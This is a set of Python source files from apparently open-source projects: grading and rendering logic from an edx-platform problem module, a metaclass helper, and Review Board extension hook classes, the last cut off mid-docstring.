return u"LoncapaProblem ({0})".format(self.problem_id)
def get_state(self):
"""
Stored per-user session data neeeded to:
1) Recreate the problem
2) Populate any student answers.
"""
return {'seed': self.seed,
'student_answers': self.student_answers,
'correct_map': self.correct_map.get_dict(),
'input_state': self.input_state,
'done': self.done}
def get_max_score(self):
"""
Return the maximum score for this problem.
"""
maxscore = 0
for responder in self.responders.values():
maxscore += responder.get_max_score()
return maxscore
def get_score(self):
"""
Compute score for this problem. The score is the number of points awarded.
Returns a dictionary {'score': integer, from 0 to get_max_score(),
'total': get_max_score()}.
"""
correct = 0
for key in self.correct_map:
try:
correct += self.correct_map.get_npoints(key)
except Exception:
log.error('key=%s, correct_map = %s', key, self.correct_map)
raise
if (not self.student_answers) or len(self.student_answers) == 0:
return {'score': 0,
'total': self.get_max_score()}
else:
return {'score': correct,
'total': self.get_max_score()}
def update_score(self, score_msg, queuekey):
"""
Deliver grading response (e.g. from async code checking) to
the specific ResponseType that requested grading
Returns an updated CorrectMap
"""
cmap = CorrectMap()
cmap.update(self.correct_map)
for responder in self.responders.values():
if hasattr(responder, 'update_score'):
# Each LoncapaResponse will update its specific entries in cmap
# cmap is passed by reference
responder.update_score(score_msg, cmap, queuekey)
self.correct_map.set_dict(cmap.get_dict())
return cmap
def ungraded_response(self, xqueue_msg, queuekey):
"""
Handle any responses from the xqueue that do not contain grades
Will try to pass the queue message to all inputtypes that can handle ungraded responses
Does not return any value
"""
# check against each inputtype
for the_input in self.inputs.values():
# if the input type has an ungraded function, pass in the values
if hasattr(the_input, 'ungraded_response'):
the_input.ungraded_response(xqueue_msg, queuekey)
def is_queued(self):
"""
Returns True if any part of the problem has been submitted to an external queue
(e.g. for grading.)
"""
return any(self.correct_map.is_queued(answer_id) for answer_id in self.correct_map)
def get_recentmost_queuetime(self):
"""
Returns a DateTime object that represents the timestamp of the most recent
queueing request, or None if not queued
"""
if not self.is_queued():
return None
# Get a list of timestamps of all queueing requests, then convert it to a DateTime object
queuetime_strs = [
self.correct_map.get_queuetime_str(answer_id)
for answer_id in self.correct_map
if self.correct_map.is_queued(answer_id)
]
queuetimes = [
datetime.strptime(qt_str, xqueue_interface.dateformat).replace(tzinfo=UTC)
for qt_str in queuetime_strs
]
return max(queuetimes)
def grade_answers(self, answers):
"""
Grade student responses. Called by capa_module.check_problem.
`answers` is a dict of all the entries from request.POST, but with the first part
of each key removed (the string before the first "_").
Thus, for example, input_ID123 -> ID123, and input_fromjs_ID123 -> fromjs_ID123
Calls the Response for each question in this problem, to do the actual grading.
"""
# if answers include File objects, convert them to filenames.
self.student_answers = convert_files_to_filenames(answers)
return self._grade_answers(answers)
def supports_rescoring(self):
"""
Checks that the current problem definition permits rescoring.
More precisely, it checks that there are no response types in
the current problem that are not fully supported (yet) for rescoring.
This includes responsetypes for which the student's answer
is not properly stored in state, i.e. file submissions. At present,
we have no way to know if an existing response was actually a real
answer or merely the filename of a file submitted as an answer.
It turns out that because rescoring is a background task, limiting
it to responsetypes that don't support file submissions also means
that the responsetypes are synchronous. This is convenient as it
permits rescoring to be complete when the rescoring call returns.
"""
return all('filesubmission' not in responder.allowed_inputfields for responder in self.responders.values())
def rescore_existing_answers(self):
"""
Rescore student responses. Called by capa_module.rescore_problem.
"""
return self._grade_answers(None)
def _grade_answers(self, student_answers):
"""
Internal grading call used for checking new 'student_answers' and also
rescoring existing student_answers.
For new student_answers being graded, `student_answers` is a dict of all the
entries from request.POST, but with the first part of each key removed
(the string before the first "_"). Thus, for example,
input_ID123 -> ID123, and input_fromjs_ID123 -> fromjs_ID123.
For rescoring, `student_answers` is None.
Calls the Response for each question in this problem, to do the actual grading.
"""
# old CorrectMap
oldcmap = self.correct_map
# start new with empty CorrectMap
newcmap = CorrectMap()
# Call each responsetype instance to do actual grading
for responder in self.responders.values():
# File objects are passed only if responsetype explicitly allows
# for file submissions. But we have no way of knowing if
# student_answers contains a proper answer or the filename of
# an earlier submission, so for now skip these entirely.
# TODO: figure out where to get file submissions when rescoring.
if 'filesubmission' in responder.allowed_inputfields and student_answers is None:
_ = self.capa_system.i18n.ugettext
raise Exception(_(u"Cannot rescore problems with possible file submissions"))
# use 'student_answers' only if it is provided, and if it might contain a file
# submission that would not exist in the persisted "student_answers".
if 'filesubmission' in responder.allowed_inputfields and student_answers is not None:
results = responder.evaluate_answers(student_answers, oldcmap)
else:
results = responder.evaluate_answers(self.student_answers, oldcmap)
newcmap.update(results)
self.correct_map = newcmap
return newcmap
def get_question_answers(self):
"""
Returns a dict of answer_ids to answer values. If we cannot generate
an answer (this sometimes happens in customresponses), that answer_id is
not included. Called by "show answers" button JSON request
(see capa_module)
"""
# dict of (id, correct_answer)
answer_map = dict()
for response in self.responders.keys():
results = self.responder_answers[response]
answer_map.update(results)
# include solutions from <solution>...</solution> stanzas
for entry in self.tree.xpath("//" + "|//".join(solution_tags)):
answer = etree.tostring(entry)
if answer:
answer_map[entry.get('id')] = contextualize_text(answer, self.context)
log.debug('answer_map = %s', answer_map)
return answer_map
def get_answer_ids(self):
"""
Return the IDs of all the responses -- these are the keys used for
the dicts returned by grade_answers and get_question_answers. (Though
get_question_answers may only return a subset of these.
"""
answer_ids = []
for response in self.responders.keys():
results = self.responder_answers[response]
answer_ids.append(results.keys())
return answer_ids
def do_targeted_feedback(self, tree):
"""
Implements targeted-feedback in-place on <multiplechoiceresponse> --
choice-level explanations shown to a student after submission.
Does nothing if there is no targeted-feedback attribute.
"""
# Note that the modifications has been done, avoiding problems if called twice.
if hasattr(self, 'has_targeted'):
return
self.has_targeted = True # pylint: disable=attribute-defined-outside-init
for mult_choice_response in tree.xpath('//multiplechoiceresponse[@targeted-feedback]'):
show_explanation = mult_choice_response.get('targeted-feedback') == 'alwaysShowCorrectChoiceExplanation'
# Grab the first choicegroup (there should only be one within each <multiplechoiceresponse> tag)
choicegroup = mult_choice_response.xpath('./choicegroup[@type="MultipleChoice"]')[0]
choices_list = list(choicegroup.iter('choice'))
# Find the student answer key that matches our <choicegroup> id
student_answer = self.student_answers.get(choicegroup.get('id'))
expl_id_for_student_answer = None
# Keep track of the explanation-id that corresponds to the student's answer
# Also, keep track of the solution-id
solution_id = None
for choice in choices_list:
if choice.get('name') == student_answer:
expl_id_for_student_answer = choice.get('explanation-id')
if choice.get('correct') == 'true':
solution_id = choice.get('explanation-id')
# Filter out targetedfeedback that doesn't correspond to the answer the student selected
# Note: following-sibling will grab all following siblings, so we just want the first in the list
targetedfeedbackset = mult_choice_response.xpath('./following-sibling::targetedfeedbackset')
if len(targetedfeedbackset) != 0:
targetedfeedbackset = targetedfeedbackset[0]
targetedfeedbacks = targetedfeedbackset.xpath('./targetedfeedback')
for targetedfeedback in targetedfeedbacks:
# Don't show targeted feedback if the student hasn't answer the problem
# or if the target feedback doesn't match the student's (incorrect) answer
if not self.done or targetedfeedback.get('explanation-id') != expl_id_for_student_answer:
targetedfeedbackset.remove(targetedfeedback)
# Do not displace the solution under these circumstances
if not show_explanation or not self.done:
continue
# The next element should either be <solution> or <solutionset>
next_element = targetedfeedbackset.getnext()
parent_element = tree
solution_element = None
if next_element is not None and next_element.tag == 'solution':
solution_element = next_element
elif next_element is not None and next_element.tag == 'solutionset':
solutions = next_element.xpath('./solution')
for solution in solutions:
if solution.get('explanation-id') == solution_id:
parent_element = next_element
solution_element = solution
# If could not find the solution element, then skip the remaining steps below
if solution_element is None:
continue
# Change our correct-choice explanation from a "solution explanation" to within
# the set of targeted feedback, which means the explanation will render on the page
# without the student clicking "Show Answer" or seeing a checkmark next to the correct choice
parent_element.remove(solution_element)
# Add our solution instead to the targetedfeedbackset and change its tag name
solution_element.tag = 'targetedfeedback'
targetedfeedbackset.append(solution_element)
def get_html(self):
"""
Main method called externally to get the HTML to be rendered for this capa Problem.
"""
self.do_targeted_feedback(self.tree)
html = contextualize_text(etree.tostring(self._extract_html(self.tree)), self.context)
return html
def handle_input_ajax(self, data):
"""
InputTypes can support specialized AJAX calls. Find the correct input and pass along the correct data
Also, parse out the dispatch from the get so that it can be passed onto the input type nicely
"""
# pull out the id
input_id = data['input_id']
if self.inputs[input_id]:
dispatch = data['dispatch']
return self.inputs[input_id].handle_ajax(dispatch, data)
else:
log.warning("Could not find matching input for id: %s", input_id)
return {}
@property
def has_multi_device_support(self):
"""
Returns whether this capa problem has multi-device support.
"""
return all(
responder.multi_device_support for responder in self.responders.values()
)
# ======= Private Methods Below ========
def _process_includes(self):
"""
Handle any <include file="foo"> tags by reading in the specified file and inserting it
into our XML tree. Fail gracefully if debugging.
"""
includes = self.tree.findall('.//include')
for inc in includes:
filename = inc.get('file')
if filename is not None:
try:
# open using LoncapaSystem OSFS filestore
ifp = self.capa_system.filestore.open(filename)
except Exception as err:
log.warning(
'Error %s in problem xml include: %s',
err,
etree.tostring(inc, pretty_print=True)
)
log.warning(
'Cannot find file %s in %s', filename, self.capa_system.filestore
)
# if debugging, don't fail - just log error
# TODO (vshnayder): need real error handling, display to users
if not self.capa_system.DEBUG:
raise
else:
continue
try:
# read in and convert to XML
incxml = etree.XML(ifp.read())
except Exception as err:
log.warning(
'Error %s in problem xml include: %s',
err,
etree.tostring(inc, pretty_print=True)
)
log.warning('Cannot parse XML in %s', (filename))
# if debugging, don't fail - just log error
# TODO (vshnayder): same as above
if not self.capa_system.DEBUG:
raise
else:
continue
# insert new XML into tree in place of include
parent = inc.getparent()
parent.insert(parent.index(inc), incxml)
parent.remove(inc)
log.debug('Included %s into %s', filename, self.problem_id)
def _extract_system_path(self, script):
"""
Extracts and normalizes additional paths for code execution.
For now, there's a default path of data/course/code; this may be removed
at some point.
script : ?? (TODO)
"""
DEFAULT_PATH = ['code']
# Separate paths by :, like the system path.
raw_path = script.get('system_path', '').split(":") + DEFAULT_PATH
# find additional comma-separated modules search path
path = []
for dir in raw_path:
if not dir:
continue
# path is an absolute path or a path relative to the data dir
dir = os.path.join(self.capa_system.filestore.root_path, dir)
# Check that we are within the filestore tree.
reldir = os.path.relpath(dir, self.capa_system.filestore.root_path)
if ".." in reldir:
log.warning("Ignoring Python directory outside of course: %r", dir)
continue
abs_dir = os.path.normpath(dir)
path.append(abs_dir)
return path
def _extract_context(self, tree):
"""
Extract content of <script>...</script> from the problem.xml file, and exec it in the
context of this problem. Provides ability to randomize problems, and also set
variables for problem answer checking.
Problem XML goes to Python execution context. Runs everything in script tags.
"""
context = {}
context['seed'] = self.seed
context['anonymous_student_id'] = self.capa_system.anonymous_student_id
all_code = ''
python_path = []
for script in tree.findall('.//script'):
stype = script.get('type')
if stype:
if 'javascript' in stype:
continue # skip javascript
if 'perl' in stype:
continue # skip perl
# TODO: evaluate only python
for d in self._extract_system_path(script):
if d not in python_path and os.path.exists(d):
python_path.append(d)
XMLESC = {"'": "'", """: '"'}
code = unescape(script.text, XMLESC)
all_code += code
extra_files = []
if all_code:
# An asset named python_lib.zip can be imported by Python code.
zip_lib = self.capa_system.get_python_lib_zip()
if zip_lib is not None:
extra_files.append(("python_lib.zip", zip_lib))
python_path.append("python_lib.zip")
try:
safe_exec(
all_code,
context,
random_seed=self.seed,
python_path=python_path,
extra_files=extra_files,
cache=self.capa_system.cache,
slug=self.problem_id,
unsafely=self.capa_system.can_execute_unsafe_code(),
)
except Exception as err:
log.exception("Error while execing script code: " + all_code)
msg = "Error while executing script code: %s" % str(err).replace('<', '<')
raise responsetypes.LoncapaProblemError(msg)
# Store code source in context, along with the Python path needed to run it correctly.
context['script_code'] = all_code
context['python_path'] = python_path
context['extra_files'] = extra_files or None
return context
def _extract_html(self, problemtree): # private
"""
Main (private) function which converts Problem XML tree to HTML.
Calls itself recursively.
Returns Element tree of XHTML representation of problemtree.
Calls render_html of Response instances to render responses into XHTML.
Used by get_html.
"""
if not isinstance(problemtree.tag, basestring):
# Comment and ProcessingInstruction nodes are not Elements,
# and we're ok leaving those behind.
# BTW: etree gives us no good way to distinguish these things
# other than to examine .tag to see if it's a string. :(
return
if (problemtree.tag == 'script' and problemtree.get('type')
and 'javascript' in problemtree.get('type')):
# leave javascript intact.
return deepcopy(problemtree)
if problemtree.tag in html_problem_semantics:
return
problemid = problemtree.get('id') # my ID
if problemtree.tag in inputtypes.registry.registered_tags():
# If this is an inputtype subtree, let it render itself.
status = "unsubmitted"
msg = ''
hint = ''
hintmode = None
input_id = problemtree.get('id')
answervariable = None
if problemid in self.correct_map:
pid = input_id
status = self.correct_map.get_correctness(pid)
msg = self.correct_map.get_msg(pid)
hint = self.correct_map.get_hint(pid)
hintmode = self.correct_map.get_hintmode(pid)
answervariable = self.correct_map.get_property(pid, 'answervariable')
value = ""
if self.student_answers and problemid in self.student_answers:
value = self.student_answers[problemid]
if input_id not in self.input_state:
self.input_state[input_id] = {}
# do the rendering
state = {
'value': value,
'status': status,
'id': input_id,
'input_state': self.input_state[input_id],
'answervariable': answervariable,
'feedback': {
'message': msg,
'hint': hint,
'hintmode': hintmode,
}
}
input_type_cls = inputtypes.registry.get_class_for_tag(problemtree.tag)
# save the input type so that we can make ajax calls on it if we need to
self.inputs[input_id] = input_type_cls(self.capa_system, problemtree, state)
return self.inputs[input_id].get_html()
# let each Response render itself
if problemtree in self.responders:
overall_msg = self.correct_map.get_overall_message()
return self.responders[problemtree].render_html(
self._extract_html, response_msg=overall_msg
)
# let each custom renderer render itself:
if problemtree.tag in customrender.registry.registered_tags():
renderer_class = customrender.registry.get_class_for_tag(problemtree.tag)
renderer = renderer_class(self.capa_system, problemtree)
return renderer.get_html()
# otherwise, render children recursively, and copy over attributes
tree = etree.Element(problemtree.tag)
for item in problemtree:
item_xhtml = self._extract_html(item)
if item_xhtml is not None:
tree.append(item_xhtml)
if tree.tag in html_transforms:
tree.tag = html_transforms[problemtree.tag]['tag']
else:
# copy attributes over if not innocufying
for (key, value) in problemtree.items():
tree.set(key, value)
tree.text = problemtree.text
tree.tail = problemtree.tail
return tree
def _preprocess_problem(self, tree): # private
"""
Assign IDs to all the responses
Assign sub-IDs to all entries (textline, schematic, etc.)
Annoted correctness and value
In-place transformation
Also create capa Response instances for each responsetype and save as self.responders
Obtain all responder answers and save as self.responder_answers dict (key = response)
"""
response_id = 1
self.responders = {}
for response in tree.xpath('//' + "|//".join(responsetypes.registry.registered_tags())):
response_id_str = self.problem_id + "_" + str(response_id)
# create and save ID for this response
response.set('id', response_id_str)
response_id += 1
answer_id = 1
input_tags = inputtypes.registry.registered_tags()
inputfields = tree.xpath(
"|".join(['//' + response.tag + '[@id=$id]//' + x for x in input_tags + solution_tags]),
id=response_id_str
)
# assign one answer_id for each input type or solution type
for entry in inputfields:
entry.attrib['response_id'] = str(response_id)
entry.attrib['answer_id'] = str(answer_id)
entry.attrib['id'] = "%s_%i_%i" % (self.problem_id, response_id, answer_id)
answer_id = answer_id + 1
# instantiate capa Response
responsetype_cls = responsetypes.registry.get_class_for_tag(response.tag)
responder = responsetype_cls(response, inputfields, self.context, self.capa_system, self.capa_module)
# save in list in self
self.responders[response] = responder
# get responder answers (do this only once, since there may be a performance cost,
# eg with externalresponse)
self.responder_answers = {}
for response in self.responders.keys():
try:
self.responder_answers[response] = self.responders[response].get_answers()
except:
log.debug('responder %s failed to properly return get_answers()',
self.responders[response]) # FIXME
raise
# <solution>...</solution> may not be associated with any specific response; give
# IDs for those separately
# TODO: We should make the namespaces consistent and unique (e.g. %s_problem_%i).
solution_id = 1
for solution in tree.findall('.//solution'):
solution.attrib['id'] = "%s_solution_%i" % (self.problem_id, solution_id)
solution_id += 1
|
tiagochiavericosta/edx-platform
|
common/lib/capa/capa/capa_problem.py
|
Python
|
agpl-3.0
| 36,583
|
import sys
import inspect
from functools import wraps
import six
class Prepareable(type):
if not six.PY3:
def __new__(cls, name, bases, attributes):
try:
constructor = attributes["__new__"]
except KeyError:
return type.__new__(cls, name, bases, attributes)
def preparing_constructor(cls, name, bases, attributes):
try:
cls.__prepare__
except AttributeError:
return constructor(cls, name, bases, attributes)
namespace = cls.__prepare__.__func__(name, bases)
defining_frame = sys._getframe(1)
get_index = None
for constant in reversed(defining_frame.f_code.co_consts):
if inspect.iscode(constant) and constant.co_name == name:
def _get_index(attribute_name, _names=constant.co_names):
try:
return _names.index(attribute_name)
except ValueError:
return 0
get_index = _get_index
break
if get_index is None:
return constructor(cls, name, bases, attributes)
by_appearance = sorted(
attributes.items(), key=lambda item: get_index(item[0])
)
for key, value in by_appearance:
namespace[key] = value
return constructor(cls, name, bases, namespace)
attributes["__new__"] = wraps(constructor)(preparing_constructor)
return type.__new__(cls, name, bases, attributes)
|
lodevil/javaobject
|
javaobject/java/prepareable.py
|
Python
|
bsd-3-clause
| 1,749
|
from __future__ import unicode_literals
from django.utils import six
from djblets.extensions.hooks import (DataGridColumnsHook, ExtensionHook,
ExtensionHookPoint, SignalHook,
TemplateHook, URLHook)
from reviewboard.accounts.backends import (register_auth_backend,
unregister_auth_backend)
from reviewboard.accounts.pages import (get_page_class,
register_account_page_class,
unregister_account_page_class)
from reviewboard.admin.widgets import (register_admin_widget,
unregister_admin_widget)
from reviewboard.attachments.mimetypes import (register_mimetype_handler,
unregister_mimetype_handler)
from reviewboard.datagrids.grids import (DashboardDataGrid,
UserPageReviewRequestDataGrid)
from reviewboard.hostingsvcs.service import (register_hosting_service,
unregister_hosting_service)
from reviewboard.reviews.fields import (get_review_request_fieldset,
register_review_request_fieldset,
unregister_review_request_fieldset)
from reviewboard.reviews.ui.base import register_ui, unregister_ui
from reviewboard.webapi.server_info import (register_webapi_capabilities,
unregister_webapi_capabilities)
@six.add_metaclass(ExtensionHookPoint)
class AuthBackendHook(ExtensionHook):
"""A hook for registering an authentication backend.
Authentication backends control user authentication, registration, and
user lookup, and user data manipulation.
This hook takes the class of an authentication backend that should
be made available to the server.
"""
def __init__(self, extension, backend_cls):
super(AuthBackendHook, self).__init__(extension)
self.backend_cls = backend_cls
register_auth_backend(backend_cls)
def shutdown(self):
super(AuthBackendHook, self).shutdown()
unregister_auth_backend(self.backend_cls)
@six.add_metaclass(ExtensionHookPoint)
class AccountPagesHook(ExtensionHook):
"""A hook for adding new pages to the My Account page.
A page can contain one or more forms or even a custom template allowing
for configuration of an extension.
This takes a list of AccountPage classes as parameters, which it will
later instantiate as necessary. Each page can be pre-populated with
one or more custom AccountPageForm classes.
"""
def __init__(self, extension, page_classes):
super(AccountPagesHook, self).__init__(extension)
self.page_classes = page_classes
for page_class in page_classes:
register_account_page_class(page_class)
def shutdown(self):
super(AccountPagesHook, self).shutdown()
for page_class in self.page_classes:
unregister_account_page_class(page_class)
@six.add_metaclass(ExtensionHookPoint)
class AccountPageFormsHook(ExtensionHook):
"""A hook for adding new forms to a page in the My Account page.
This is used to add custom forms to a page in the My Account page. The
form can be used to provide user-level customization of an extension,
through a traditional form-based approach or even through custom
JavaScript.
This hook takes the ID of a registered page where the form should be
placed. Review Board supplies the following built-in page IDs:
* ``settings``
* ``authentication``
* ``profile``
* ``groups``
Any registered page ID can be provided, whether from this extension
or another.
Form classes can only be added to a single page.
"""
def __init__(self, extension, page_id, form_classes):
super(AccountPageFormsHook, self).__init__(extension)
self.page_id = page_id
self.form_classes = form_classes
page_class = get_page_class(page_id)
for form_class in form_classes:
page_class.add_form(form_class)
def shutdown(self):
super(AccountPageFormsHook, self).shutdown()
page_class = get_page_class(self.page_id)
for form_class in self.form_classes:
page_class.remove_form(form_class)
@six.add_metaclass(ExtensionHookPoint)
class AdminWidgetHook(ExtensionHook):
"""A hook for adding a new widget to the admin screen.
By default the new widget is added as a small widget in the right column
of the admin page. To instead add the new widget as a large widget in the
center of the admin page, pass in True for ``primary``.
"""
def __init__(self, extension, widget_cls, primary=False):
super(AdminWidgetHook, self).__init__(extension)
self.widget_cls = widget_cls
register_admin_widget(widget_cls, primary)
def shutdown(self):
super(AdminWidgetHook, self).shutdown()
unregister_admin_widget(self.widget_cls)
@six.add_metaclass(ExtensionHookPoint)
class DataGridSidebarItemsHook(ExtensionHook):
"""A hook for adding items to the sidebar of a datagrid.
Extensions can use this hook to plug new items into the sidebar of
any datagrid supporting sidebars.
The items can be any subclass of
:py:class:`reviewboard.datagrids.sidebar.BaseSidebarItem`, including the
built-in :py:class:`reviewboard.datagrids.sidebar.BaseSidebarSection` and
built-in :py:class:`reviewboard.datagrids.sidebar.SidebarNavItem`.
"""
def __init__(self, extension, datagrid, item_classes):
super(DataGridSidebarItemsHook, self).__init__(extension)
if not hasattr(datagrid, 'sidebar'):
raise ValueError('The datagrid provided does not have a sidebar')
self.datagrid = datagrid
self.item_classes = item_classes
for item in item_classes:
datagrid.sidebar.add_item(item)
def shutdown(self):
super(DataGridSidebarItemsHook, self).shutdown()
for item in self.item_classes:
self.datagrid.sidebar.remove_item(item)
# We don't use the ExtensionHookPoint metaclass here, because we actually
# want these to register in the base DataGridColumnsHook point.
class DashboardColumnsHook(DataGridColumnsHook):
"""A hook for adding custom columns to the dashboard.
Extensions can use this hook to provide one or more custom columns
in the dashboard. These columns can be added by users, moved around,
and even sorted, like other columns.
Each value passed to ``columns`` must be an instance of
:py:class:`djblets.datagrid.grids.Column`.
It also must have an ``id`` attribute set. This must be unique within
the dashboard. It is recommended to use a vendor-specific prefix to the
ID, in order to avoid conflicts.
"""
def __init__(self, extension, columns):
super(DashboardColumnsHook, self).__init__(
extension, DashboardDataGrid, columns)
@six.add_metaclass(ExtensionHookPoint)
class DashboardSidebarItemsHook(DataGridSidebarItemsHook):
"""A hook for adding items to the sidebar of the dashboard.
Extensions can use this hook to plug new items into the sidebar of
the dashboard. These will appear below the built-in items.
The items can be any subclass of
:py:class:`reviewboard.datagrids.sidebar.BaseSidebarItem`, including the
built-in :py:class:`reviewboard.datagrids.sidebar.BaseSidebarSection` and
built-in :py:class:`reviewboard.datagrids.sidebar.SidebarNavItem`.
"""
def __init__(self, extension, item_classes):
super(DashboardSidebarItemsHook, self).__init__(
extension, DashboardDataGrid, item_classes)
@six.add_metaclass(ExtensionHookPoint)
class HostingServiceHook(ExtensionHook):
"""A hook for registering a hosting service."""
def __init__(self, extension, service_cls):
super(HostingServiceHook, self).__init__(extension)
self.name = service_cls.name
register_hosting_service(service_cls.name, service_cls)
def shutdown(self):
super(HostingServiceHook, self).shutdown()
unregister_hosting_service(self.name)
@six.add_metaclass(ExtensionHookPoint)
class NavigationBarHook(ExtensionHook):
"""A hook for adding entries to the main navigation bar.
This takes a list of entries. Each entry represents something
on the navigation bar, and is a dictionary with the following keys:
* ``label``: The label to display
* ``url``: The URL to point to.
* ``url_name``: The name of the URL to point to.
Only one of ``url`` or ``url_name`` is required. ``url_name`` will
take precedence.
Optionally, a callable can be passed in for ``is_enabled_for``, which takes
a single argument (the user) and returns True or False, indicating whether
the entries should be shown. If this is not passed in, the entries are
always shown (including for anonymous users).
If your hook needs to access the template context, it can override
get_entries and return results from there.
"""
def __init__(self, extension, entries={}, is_enabled_for=None,
*args, **kwargs):
super(NavigationBarHook, self).__init__(extension, *args,
**kwargs)
self.entries = entries
self.is_enabled_for = is_enabled_for
def get_entries(self, context):
if (not callable(self.is_enabled_for) or
self.is_enabled_for(context.get('user', None))):
return self.entries
else:
return []
@six.add_metaclass(ExtensionHookPoint)
class ReviewRequestApprovalHook(ExtensionHook):
"""A hook for determining if a review request is approved.
Extensions can use this to hook into the process for determining
review request approval, which may impact any scripts integrating
with Review Board to, for example, allow committing to a repository.
"""
def is_approved(self, review_request, prev_approved, prev_failure):
"""Determines if the review request is approved.
This function is provided with the review request and the previously
calculated approved state (either from a prior hook, or from the
base state of ``ship_it_count > 0 and issue_open_count == 0``).
If approved, this should return True. If unapproved, it should
return a tuple with False and a string briefly explaining why it's
not approved. This may be displayed to the user.
It generally should also take the previous approved state into
consideration in this choice (such as returning False if the previous
state is False). This is, however, fully up to the hook.
The approval decision may be overridden by any following hooks.
"""
raise NotImplementedError
@six.add_metaclass(ExtensionHookPoint)
class ReviewRequestFieldSetsHook(ExtensionHook):
"""A hook for creating fieldsets on the side of the review request page.
A fieldset contains one or more fields, and is mainly used to separate
groups of fields from each other.
This takes a list of fieldset classes as parameters, which it will
later instantiate as necessary. Each fieldset can be pre-populated with
one or more custom field classes.
"""
def __init__(self, extension, fieldsets):
super(ReviewRequestFieldSetsHook, self).__init__(extension)
self.fieldsets = fieldsets
for fieldset in fieldsets:
register_review_request_fieldset(fieldset)
def shutdown(self):
super(ReviewRequestFieldSetsHook, self).shutdown()
for fieldset in self.fieldsets:
unregister_review_request_fieldset(fieldset)
@six.add_metaclass(ExtensionHookPoint)
class ReviewRequestFieldsHook(ExtensionHook):
"""A hook for creating fields on the review request page.
This is used to create custom fields on a review request page for
requesting and storing data. A field can be editable, or it can be only
for display purposes. See the classes in
:py:mod:`reviewboard.reviews.fields` for more information and
documentation.
This hook takes the ID of a registered fieldset where the provided
field classes should be added. Review Board supplies three built-in
fieldset IDs:
* ``main`` - The fieldset with Description and Testing Done.
* ``info`` - The "Information" fieldset on the side.
* ``reviewers`` - The "Reviewers" fieldset on the side.
Any registered fieldset ID can be provided, whether from this extension
or another.
Field classes can only be added to a single fieldset.
"""
def __init__(self, extension, fieldset_id, fields):
super(ReviewRequestFieldsHook, self).__init__(extension)
self.fieldset_id = fieldset_id
self.fields = fields
fieldset = get_review_request_fieldset(fieldset_id)
for field_cls in fields:
fieldset.add_field(field_cls)
def shutdown(self):
super(ReviewRequestFieldsHook, self).shutdown()
fieldset = get_review_request_fieldset(self.fieldset_id)
for field_cls in self.fields:
fieldset.remove_field(field_cls)
@six.add_metaclass(ExtensionHookPoint)
class WebAPICapabilitiesHook(ExtensionHook):
"""This hook allows adding capabilities to the web API server info.
Note that this does not add the functionality, but adds to the server
info listing.
"""
def __init__(self, extension, caps):
super(WebAPICapabilitiesHook, self).__init__(extension)
register_webapi_capabilities(extension.id, caps)
def shutdown(self):
super(WebAPICapabilitiesHook, self).shutdown()
unregister_webapi_capabilities(self.extension.id)
@six.add_metaclass(ExtensionHookPoint)
class CommentDetailDisplayHook(ExtensionHook):
"""This hook allows adding details to the display of comments.
The hook can provide additional details to display for a comment in a
review and e-mails.
"""
def render_review_comment_detail(self, comment):
raise NotImplementedError
def render_email_comment_detail(self, comment, is_html):
raise NotImplementedError
@six.add_metaclass(ExtensionHookPoint)
class ReviewUIHook(ExtensionHook):
"""This hook allows integration of Extension-defined Review UIs.
This accepts a list of Review UIs specified by the Extension and
registers them when the hook is created. Likewise, it unregisters
the same list of Review UIs when the Extension is disabled.
"""
def __init__(self, extension, review_uis):
super(ReviewUIHook, self).__init__(extension)
self.review_uis = review_uis
for review_ui in self.review_uis:
register_ui(review_ui)
def shutdown(self):
super(ReviewUIHook, self).shutdown()
for review_ui in self.review_uis:
unregister_ui(review_ui)
@six.add_metaclass(ExtensionHookPoint)
class FileAttachmentThumbnailHook(ExtensionHook):
"""This hook allows custom thumbnails to be defined for file attachments.
This accepts a list of Mimetype Handlers specified by the Extension
that must:
* Subclass :py:class:`reviewboard.attachments.mimetypes.MimetypeHandler`
* Define a list of file mimetypes it can handle in a class variable
called `supported_mimetypes`
* Define how to generate a thumbnail of that mimetype by overriding
the instance function `def get_thumbnail(self):`
These MimetypeHandlers are registered when the hook is created. Likewise,
it unregisters the same list of MimetypeHandlers when the Extension is
disabled.
"""
def __init__(self, extension, mimetype_handlers):
super(FileAttachmentThumbnailHook, self).__init__(extension)
self.mimetype_handlers = mimetype_handlers
for mimetype_handler in self.mimetype_handlers:
register_mimetype_handler(mimetype_handler)
def shutdown(self):
super(FileAttachmentThumbnailHook, self).shutdown()
for mimetype_handler in self.mimetype_handlers:
unregister_mimetype_handler(mimetype_handler)
class ActionHook(ExtensionHook):
"""A hook for adding actions to a review request.
Actions are displayed somewhere on the action bar (alongside Reviews,
Close, etc.) of the review request. The subclasses of ActionHook should
be used to determine placement.
The provided actions parameter must be a list of actions. Each
action must be a dict with the following keys:
* ``id``: The ID of this action (optional).
* ``image``: The path to the image used for the icon (optional).
* ``image_width``: The width of the image (optional).
* ``image_height``: The height of the image (optional).
* ``label``: The label for the action.
* ``url``: The URI to invoke when the action is clicked.
If you want to invoke a javascript action, this should
be '#', and you should use a selector on the `id`
field to attach the handler (as opposed to a
javascript: URL, which doesn't work on all browsers).
If your hook needs to access the template context, it can override
get_actions and return results from there.
"""
def __init__(self, extension, actions=[], *args, **kwargs):
super(ActionHook, self).__init__(extension, *args, **kwargs)
self.actions = actions
def get_actions(self, context):
"""Returns the list of action information for this action."""
return self.actions
@six.add_metaclass(ExtensionHookPoint)
class ReviewRequestActionHook(ActionHook):
"""A hook for adding an action to the review request page."""
@six.add_metaclass(ExtensionHookPoint)
class ReviewRequestDropdownActionHook(ActionHook):
"""A hook for adding an drop down action to the review request page.
The actions for a drop down action should contain:
* ``id``: The ID of this action (optional).
* ``label``: The label of the drop-down.
* ``items``: A list of ActionHook-style dicts (see ActionHook params).
For example::
actions = [{
'id': 'id 0',
'label': 'Title',
'items': [
{
'id': 'id 1',
'label': 'Item 1',
'url': '...',
},
{
'id': 'id 2',
'label': 'Item 2',
'url': '...',
}
]
}]
"""
@six.add_metaclass(ExtensionHookPoint)
class DiffViewerActionHook(ActionHook):
"""A hook for adding an action to the diff viewer page."""
@six.add_metaclass(ExtensionHookPoint)
class HeaderActionHook(ActionHook):
"""A hook for putting an action in the page header."""
@six.add_metaclass(ExtensionHookPoint)
class HeaderDropdownActionHook(ActionHook):
"""A hook for putting multiple actions into a header dropdown."""
@six.add_metaclass(ExtensionHookPoint)
class UserPageSidebarItemsHook(DataGridSidebarItemsHook):
"""A hook for adding items to the sidebar of the user page.
Extensions can use this hook to plug new items into the sidebar of
the user page. These will appear below the built-in items.
The items can be any subclass of
:py:class:`reviewboard.datagrids.sidebar.BaseSidebarItem`, including the
